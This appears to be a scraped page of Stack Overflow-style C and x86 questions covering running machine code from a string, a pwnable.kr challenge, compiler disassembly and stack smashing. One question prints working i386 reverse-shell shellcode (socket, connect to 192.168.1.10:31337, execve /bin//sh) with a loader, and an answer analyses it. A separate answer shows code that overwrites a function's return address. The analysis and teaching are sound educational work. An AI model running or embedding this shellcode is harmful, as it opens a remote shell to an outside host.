executing the content of a string in c [duplicate] - c

This question already has answers here:
How to get c code to execute hex machine code?
(7 answers)
Closed 2 years ago.
#include<stdio.h>
#include<stdlib.h>
char code[] ="\x52\x56\x57\x50\xB8\x41\x00\x00\x00\x50\xB8\x01\x00\x00\x00\xBF\x01\x00\x00\x00\x48\x89\xE6\xBA\x01\x00\x00\x00\x0F\x05\x58\x58\x5F\x5E\x5A\xC3";
int main(){
void(*func)() = (void (*)())code;
(*func)();
return 0 ;
}
what I have here is a string which stores a binary code to print a character ('A') , I pass it as a function pointer to func , than i try to execute it .
the output :
$ ./test
Segmentation fault (core dumped)
this is the assembly code :
0: 52 push rdx
1: 56 push rsi
2: 57 push rdi
3: 50 push rax
4: b8 41 00 00 00 mov eax,0x41
9: 50 push rax
a: b8 01 00 00 00 mov eax,0x1
f: bf 01 00 00 00 mov edi,0x1
14: 48 89 e6 mov rsi,rsp
17: ba 01 00 00 00 mov edx,0x1
1c: 0f 05 syscall
1e: 58 pop rax
1f: 58 pop rax
20: 5f pop rdi
21: 5e pop rsi
22: 5a pop rdx
23: c3 ret

As pointed out by #WeatherVane, you need permission to execute a data segment, mprotect can help:
#include <stdio.h>
#include <sys/mman.h>
#include <stdint.h>
static char code[] = "\x52\x56\x57\x50\xB8\x41\x00\x00\x00\x50\xB8\x01\x00\x00"
"\x00\xBF\x01\x00\x00\x00\x48\x89\xE6\xBA\x01\x00\x00\x00"
"\x0F\x05\x58\x58\x5F\x5E\x5A\xC3";
int main(void)
{
uintptr_t page = (uintptr_t)code & -4095ULL;
mprotect((void *)page, 4096, PROT_READ | PROT_EXEC | PROT_WRITE);
void (*func)(void) = (void (*)(void))code;
func();
return 0;
}
You can see the result (A) in godbolt

Related

Compiler optimization of strcmp I don't understand, against a constant string

In order to improve my binary exploitation skills, and deepen my understanding in low level environments I tried solving challenges in pwnable.kr, The first challenge- called fd has the following C code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char buf[32];
int main(int argc, char* argv[], char* envp[]){
if(argc<2){
printf("pass argv[1] a number\n");
return 0;
}
int fd = atoi( argv[1] ) - 0x1234;
int len = 0;
len = read(fd, buf, 32);
if(!strcmp("LETMEWIN\n", buf)){
printf("good job :)\n");
system("/bin/cat flag");
exit(0);
}
printf("learn about Linux file IO\n");
return 0;
}
I used objdump -S -g ./fd in order to disassemble it, and I got confused, because insteaad of calling a strcmp function. It just compared the strings without calling it.
This is the assembly code im talking about:
80484c6: e8 05 ff ff ff call 80483d0 <atoi#plt>
80484cb: 2d 34 12 00 00 sub eax,0x1234
; eax = atoi( argv[1] ) - 0x1234;
; initialize fd=eax
80484d0: 89 44 24 18 mov DWORD PTR [esp+0x18],eax
; initialize len
80484d4: c7 44 24 1c 00 00 00 mov DWORD PTR [esp+0x1c],0x0
; Set up read variables
80484db: 00
80484dc: c7 44 24 08 20 00 00 mov DWORD PTR [esp+0x8],0x20 ; read 32 bytes
80484e3: 00
80484e4: c7 44 24 04 60 a0 04 mov DWORD PTR [esp+0x4],0x804a060 ; buf variable address
80484eb: 08
80484ec: 8b 44 24 18 mov eax,DWORD PTR [esp+0x18]
80484f0: 89 04 24 mov DWORD PTR [esp],eax ; fd variable
80484f3: e8 78 fe ff ff call 8048370 <read#plt>
80484f8: 89 44 24 1c mov DWORD PTR [esp+0x1c],eax
80484fc: ba 46 86 04 08 mov edx,0x8048646 ; "LETMEWIN\n" address
8048501: b8 60 a0 04 08 mov eax,0x804a060 ; buf address
8048506: b9 0a 00 00 00 mov ecx,0xa ; what is this?
; strcmp starts here?
804850b: 89 d6 mov esi,edx
804850d: 89 c7 mov edi,eax
804850f: f3 a6 repz cmps BYTE PTR ds:[esi],BYTE PTR es:[edi] ; <------- ?STRCMP?
The things I don't understand are:
Where is the strcmp call? And why is it like that?
What does this 8048506: b9 0a 00 00 00 mov ecx,0xa do?
The compiler inlined strcmp against a known-length string using repe cmpsb which implements memcmp.
It loads into register esi the address of the constant literal string "LETMEWIN\n". Note that the length of this string is 10 (with the '\0' at the end).
Then it loads the address of buf into edi register, then it calls for the x86 instruction:
repz cmps BYTE PTR ds:[esi],BYTE PTR es:[edi]
repz repeats the following instruction as long as zero flag is set and up to the number of times stored in ecx (this explains you the mov ecx,0xa ; what is this?).
The repeated instruction is cmps which compares strings (byte by byte) and automatically increases the pointers by 1 on each iteration.
When the compared bytes are equal, it sets the zero flag.
So per your questions:
Where is the strcmp call? And why is it like that?
No explicit call for strcmp, it is optimized out and replaced with inlined code:
80484fc: ba 46 86 04 08 mov edx,0x8048646 ; "LETMEWIN\n" address
8048501: b8 60 a0 04 08 mov eax,0x804a060 ; buf address
8048506: b9 0a 00 00 00 mov ecx,0xa ; number of bytes to compare
804850b: 89 d6 mov esi,edx
804850d: 89 c7 mov edi,eax
804850f: f3 a6 repz cmps BYTE PTR ds:[esi],BYTE PTR es:[edi] ;
Actually it misses the part where it should check if the returned value of strcmp is zero or not. I think you just didn't copy it here. There probably should be something like je ... / jz ... / jne ... / jnz ... right after the repz ... line.
What does this 8048506: b9 0a 00 00 00 mov ecx,0xa do?
It sets the maximum number of bytes to compare.

What does this shellcode mean?

I've found an interesting code and run it, and I wonder what this code does.
I'm worried if this code harms my computer
#include <stdio.h>
/*
ipaddr 192.168.1.10 (c0a8010a)
port 31337 (7a69)
*/
#define IPADDR "\xc0\xa8\x01\x0a"
#define PORT "\x7a\x69"
unsigned char code[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\xb0\x66\xb3\x01\x51\x6a\x06\x6a"
"\x01\x6a\x02\x89\xe1\xcd\x80\x89"
"\xc6\xb0\x66\x31\xdb\xb3\x02\x68"
IPADDR"\x66\x68"PORT"\x66\x53\xfe"
"\xc3\x89\xe1\x6a\x10\x51\x56\x89"
"\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"
"\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"
"\xc0\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"
"\x80";
main()
{
printf("Shellcode Length: %d\n", sizeof(code)-1);
int (*ret)() = (int(*)())code;
ret();
}
I don't know about shellcode
First, you should disassemble the code, for example by modifying the source to
#include <stdio.h>
/*
ipaddr 192.168.1.10 (c0a8010a)
port 31337 (7a69)
*/
#define IPADDR "\xc0\xa8\x01\x0a"
#define PORT "\x7a\x69"
unsigned char code[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\xb0\x66\xb3\x01\x51\x6a\x06\x6a"
"\x01\x6a\x02\x89\xe1\xcd\x80\x89"
"\xc6\xb0\x66\x31\xdb\xb3\x02\x68"
IPADDR"\x66\x68"PORT"\x66\x53\xfe"
"\xc3\x89\xe1\x6a\x10\x51\x56\x89"
"\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"
"\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"
"\xc0\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"
"\x80";
main()
{
write(1, code, sizeof(code)-1);
}
$ gcc -O2 sc.c -o sc
$ ./sc > sc.bin
Now, you can use objdump to get the disassembled source (isa is obviously ia32):
$ objdump -bbinary -mi386 -D sc.bin
Disassembly of section .data:
00000000 <.data>:
0: 31 c0 xor %eax,%eax
2: 31 db xor %ebx,%ebx
4: 31 c9 xor %ecx,%ecx
6: 31 d2 xor %edx,%edx
8: b0 66 mov $0x66,%al
a: b3 01 mov $0x1,%bl
c: 51 push %ecx
d: 6a 06 push $0x6
f: 6a 01 push $0x1
11: 6a 02 push $0x2
13: 89 e1 mov %esp,%ecx
15: cd 80 int $0x80
17: 89 c6 mov %eax,%esi
19: b0 66 mov $0x66,%al
1b: 31 db xor %ebx,%ebx
1d: b3 02 mov $0x2,%bl
1f: 68 c0 a8 01 0a push $0xa01a8c0
24: 66 68 7a 69 pushw $0x697a
28: 66 53 push %bx
2a: fe c3 inc %bl
2c: 89 e1 mov %esp,%ecx
2e: 6a 10 push $0x10
30: 51 push %ecx
31: 56 push %esi
32: 89 e1 mov %esp,%ecx
34: cd 80 int $0x80
36: 31 c9 xor %ecx,%ecx
38: b1 03 mov $0x3,%cl
3a: fe c9 dec %cl
3c: b0 3f mov $0x3f,%al
3e: cd 80 int $0x80
40: 75 f8 jne 0x3a
42: 31 c0 xor %eax,%eax
44: 52 push %edx
45: 68 6e 2f 73 68 push $0x68732f6e
4a: 68 2f 2f 62 69 push $0x69622f2f
4f: 89 e3 mov %esp,%ebx
51: 52 push %edx
52: 53 push %ebx
53: 89 e1 mov %esp,%ecx
55: 52 push %edx
56: 89 e2 mov %esp,%edx
58: b0 0b mov $0xb,%al
5a: cd 80 int $0x80
Now you can start disassembling. Most important are the syscalls (int $0x80); the syscall numbers are in register %eax (you can see, which syscall it is, in the includefile asm/unistd_32.h), the parameters are in other registers.
The more dangerous (and less reliable), but easier and faster way:
You can create some kind of sandbox (for example, a chrooted, unprivileged user on a unix system, or even better, a vm) and run the code with "strace" to get an idea, what it does. However, this might be less reliable, since you cannot know for sure, if you see a relevant codepath then due to the circumstances or anti-debugging techniques.
This shellcode is bind port shellcode through this address 192.168.1.10. This is commonly used for remote exploit
write(1, "Shellcode Length: 92\n", 21Shellcode Length: 92
) = 21
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(31337), sin_addr=inet_addr("192.168.1.10")}, 16
In other terminal, if correct you can use command like nc 192.168.1.10 31337
Of course if you aware with this shellcode, you can do static analysis (like disassemble) every bytes of shellcode.

Declare variable first or directly, is there a difference?

Is there a difference between declaring a variable first and then assigning a value or directly declaring and assigning a value in the compiled function? Does the compiled function do the same work? e.g, does it still read the parameters, declare variables and then assign value or is there a difference between the two examples in the compiled versions?
example:
void foo(u32 value) {
u32 extvalue = NULL;
extvalue = value;
}
compared with
void foo(u32 value) {
u32 extvalue = value;
}
I am under the impression that there is no difference between those two functions if you look at the compiled code, e.g they will look the same and i will not be able to tell which is which.
it depends on the compiler & the optimization level of course.
A dumb compiler/low optimization level when it sees:
u32 extvalue = NULL;
extvalue = value;
could set to NULL then to value in the next line.
Since extvalue isn't used in-between, the NULL initialization is useless and most compilers directly set to value as an easy optimization
Note that declaring a variable isn't really an instruction per se. The compiler just allocates auto memory to store this variable.
I've tested a simple code with and without assignment and the result is diff
erent when using gcc compiler 6.2.1 with -O0 (don't optimize anything) flag:
#include <stdio.h>
void foo(int value) {
int extvalue = 0;
extvalue = value;
printf("%d",extvalue);
}
disassembled:
Disassembly of section .text:
00000000 <_foo>:
0: 55 push %ebp
1: 89 e5 mov %esp,%ebp
3: 83 ec 28 sub $0x28,%esp
6: c7 45 f4 00 00 00 00 movl $0x0,-0xc(%ebp) <=== here we see the init
d: 8b 45 08 mov 0x8(%ebp),%eax
10: 89 45 f4 mov %eax,-0xc(%ebp)
13: 8b 45 f4 mov -0xc(%ebp),%eax
16: 89 44 24 04 mov %eax,0x4(%esp)
1a: c7 04 24 00 00 00 00 movl $0x0,(%esp)
21: e8 00 00 00 00 call 26 <_foo+0x26>
26: c9 leave
27: c3 ret
now:
void foo(int value) {
int extvalue;
extvalue = value;
printf("%d",extvalue);
}
disassembled:
Disassembly of section .text:
00000000 <_foo>:
0: 55 push %ebp
1: 89 e5 mov %esp,%ebp
3: 83 ec 28 sub $0x28,%esp
6: 8b 45 08 mov 0x8(%ebp),%eax
9: 89 45 f4 mov %eax,-0xc(%ebp)
c: 8b 45 f4 mov -0xc(%ebp),%eax
f: 89 44 24 04 mov %eax,0x4(%esp)
13: c7 04 24 00 00 00 00 movl $0x0,(%esp)
1a: e8 00 00 00 00 call 1f <_foo+0x1f>
1f: c9 leave
20: c3 ret
21: 90 nop
22: 90 nop
23: 90 nop
the 0 init has disappeared. The compiler didn't optimize the initialization in that case.
If I switch to -O2 (good optimization level) the code is then identical in both cases, compiler found that the initialization wasn't necessary (still, silent, no warnings):
0: 55 push %ebp
1: 89 e5 mov %esp,%ebp
3: 83 ec 18 sub $0x18,%esp
6: 8b 45 08 mov 0x8(%ebp),%eax
9: c7 04 24 00 00 00 00 movl $0x0,(%esp)
10: 89 44 24 04 mov %eax,0x4(%esp)
14: e8 00 00 00 00 call 19 <_foo+0x19>
19: c9 leave
1a: c3 ret
I tried these functions in godbolt:
void foo(uint32_t value)
{
uint32_t extvalue = NULL;
extvalue = value;
}
void bar(uint32_t value)
{
uint32_t extvalue = value;
}
I ported to the actual type uint32_t rather than u32 which is not standard. The resulting non-optimized assembly generated by x86-64 GCC 6.3 is:
foo(unsigned int):
push rbp
mov rbp, rsp
mov DWORD PTR [rbp-20], edi
mov DWORD PTR [rbp-4], 0
mov eax, DWORD PTR [rbp-20]
mov DWORD PTR [rbp-4], eax
nop
pop rbp
ret
bar(unsigned int):
push rbp
mov rbp, rsp
mov DWORD PTR [rbp-20], edi
mov eax, DWORD PTR [rbp-20]
mov DWORD PTR [rbp-4], eax
nop
pop rbp
ret
So clearly the non-optimized code retains the (weird, as pointed out by others since it's not written to a pointer) NULL assignment, which is of course pointless.
I'd vote for the second one since it's shorter (less to hold in one's head when reading the code), and never allow/recommend the pointless setting to NULL before overwriting with the proper value. I would consider that a bug, since you're saying/doing something you don't mean.

Smashing the stack not working

I have gone through the walkthrough about smashing the stack. Both the one http://insecure.org/stf/smashstack.html here and one I found on here Trying to smash the stack. I understand what is suppose to be happening, but I can't get it to work properly.
This is just like the other scenarios. I need to skip x=1 and print 0 as the value of x.
I compile with:
gcc file.c
The original code :
void function(){
char buffer[8];
}
void main(){
int x;
x = 0;
function();
x = 1;
printf("%d\n", x);
}
When I run
objdump -dS a.out
I get
0000000000400530 <function>:
400530: 55 push %rbp
400531: 48 89 e5 mov %rsp,%rbp
400534: 5d pop %rbp
400535: c3 retq
0000000000400536 <main>:
400536: 55 push %rbp
400537: 48 89 e5 mov %rsp,%rbp
40053a: 48 83 ec 20 sub $0x20,%rsp
40053e: 89 7d ec mov %edi,-0x14(%rbp)
400541: 48 89 75 e0 mov %rsi,-0x20(%rbp)
400545: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%rbp)
40054c: b8 00 00 00 00 mov $0x0,%eax
400551: e8 da ff ff ff callq 400530 <function>
400556: c7 45 fc 01 00 00 00 movl $0x1,-0x4(%rbp)
40055d: 8b 45 fc mov -0x4(%rbp),%eax
400560: 89 c6 mov %eax,%esi
400562: bf 10 06 40 00 mov $0x400610,%edi
400567: b8 00 00 00 00 mov $0x0,%eax
40056c: e8 9f fe ff ff callq 400410 <printf#plt>
400571: c9 leaveq
400572: c3 retq
400573: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1)
40057a: 00 00 00
40057d: 0f 1f 00 nopl (%rax)
In the function I need to figure out how many bytes the return address is beyond the start of the buffer. I am not sure about this value. But since there are 6 bytes from the beginnig of the function to the return; would I add 7 bytes to the buffer?
Then I need to skip the instruction
x=1;
And since that instruction is 7 bytes long. Would I add 7 to return pointer?
Something like this?
void function(){
char buffer[8];
int *ret = buffer + 7;
(*ret) += 7;
}
void main(){
int x;
x = 0;
function();
x = 1;
printf("%d\n", x);
}
This throws the warning:
warning: initialization from incompatible pointer type [enabled by default]
int *ret = buffer1 + 5;
^
And the output is 1. What am I doing wrong? And can you explain how to do it right and why it is the correct way?
Thank you.
Try the function below, I wrote it for 32-bit compiler try using (-m32 gcc flag) or with a little effort you can make it work with your 64-bit compiler (Note that in your objdump listing you got 7 bytes offset between call to function and the next instruction so use 7 instead of 8.
void function(void)
{
unsigned long *x;
/* &x will more likely be at -4(ebp) */
/* Adding 1 (+4) gets us to stored ebp */
/* Adding 2 (+8) gets us to stored return address */
x = (unsigned long *)(&x + 2);
/* This is the tricky part */
/* TODO: On my 32-bit compiler gap between call to function
and the next instruction is 8 */
*x += 8;
}
We know that automatic variables are created on the stack - so taking the address of an automatic variable yields a pointer into the stack. When you call a void function, its return address is pushed onto the stack and the size of that address depends on your platform (4 or 8 bytes normally). So if you pass the address of an automatic variable to a function and then write over the memory before that address, you will damage the return address and smash the stack. Here is an example:
#include <stdlib.h>
#include <stdio.h>
static void f(int *p)
{
p[0] = 0x30303030;
p[1] = 0x31313131;
*(p - 1) = 0x35353535;
*(p - 2) = 0x36363636;
}
int main()
{
int a = 0x41424344;
int b = 0x45464748;
int c = 0x494a4b5c;
f(&b);
printf("%08x %08x %08x\n", a, b, c);
return 0;
}
I compiled this on linux with 'gcc -g' and ran under gdb and got this:
Program received signal SIGSEGV, Segmentation fault.
0x000000000040056a in f (p=0x7fffffffde74) at smash.c:10
10 }
(gdb) bt
#0 0x000000000040056a in f (p=0x7fffffffde74) at smash.c:10
#1 0x3636363600400594 in ?? ()
#2 0x3030303035353535 in ?? ()
#3 0x494a4b5c31313131 in ?? ()
#4 0x0000000000000000 in ?? ()
(gdb)
As you can see, the parent function addresses now contain some of my magic numbers. I ran this on 64 bit linux, so really I should have used 64 bit ints to fully overwrite the return address - as it is I left the lower word untouched.

C to Assembly, per-instruction translator [duplicate]

This question already has answers here:
Using GCC to produce readable assembly?
(11 answers)
Closed 9 years ago.
gcc -S test.c converts the c code into assembly. What I need is a per-instruction translator. I mean I need a way through which I can know that this set of assembly instructions correspond to this c statement and so on NOT whole c code to whole assembly code. Any idea? Thanks in advance
This can be done with objdump -S which tries to interpret the debugging info - provided it was compiled with -g or equivalent. For example, for the program:
int main(void)
{
int x = 42;
int y = 24;
return x + y;
}
It does:
00000000 <main>:
int main(void)
{
0: 55 push %ebp
1: 89 e5 mov %esp,%ebp
3: 83 ec 10 sub $0x10,%esp
int x = 42;
6: c7 45 fc 2a 00 00 00 movl $0x2a,-0x4(%ebp)
int y = 24;
d: c7 45 f8 18 00 00 00 movl $0x18,-0x8(%ebp)
return x + y;
14: 8b 45 f8 mov -0x8(%ebp),%eax
17: 8b 55 fc mov -0x4(%ebp),%edx
1a: 01 d0 add %edx,%eax
}

Resources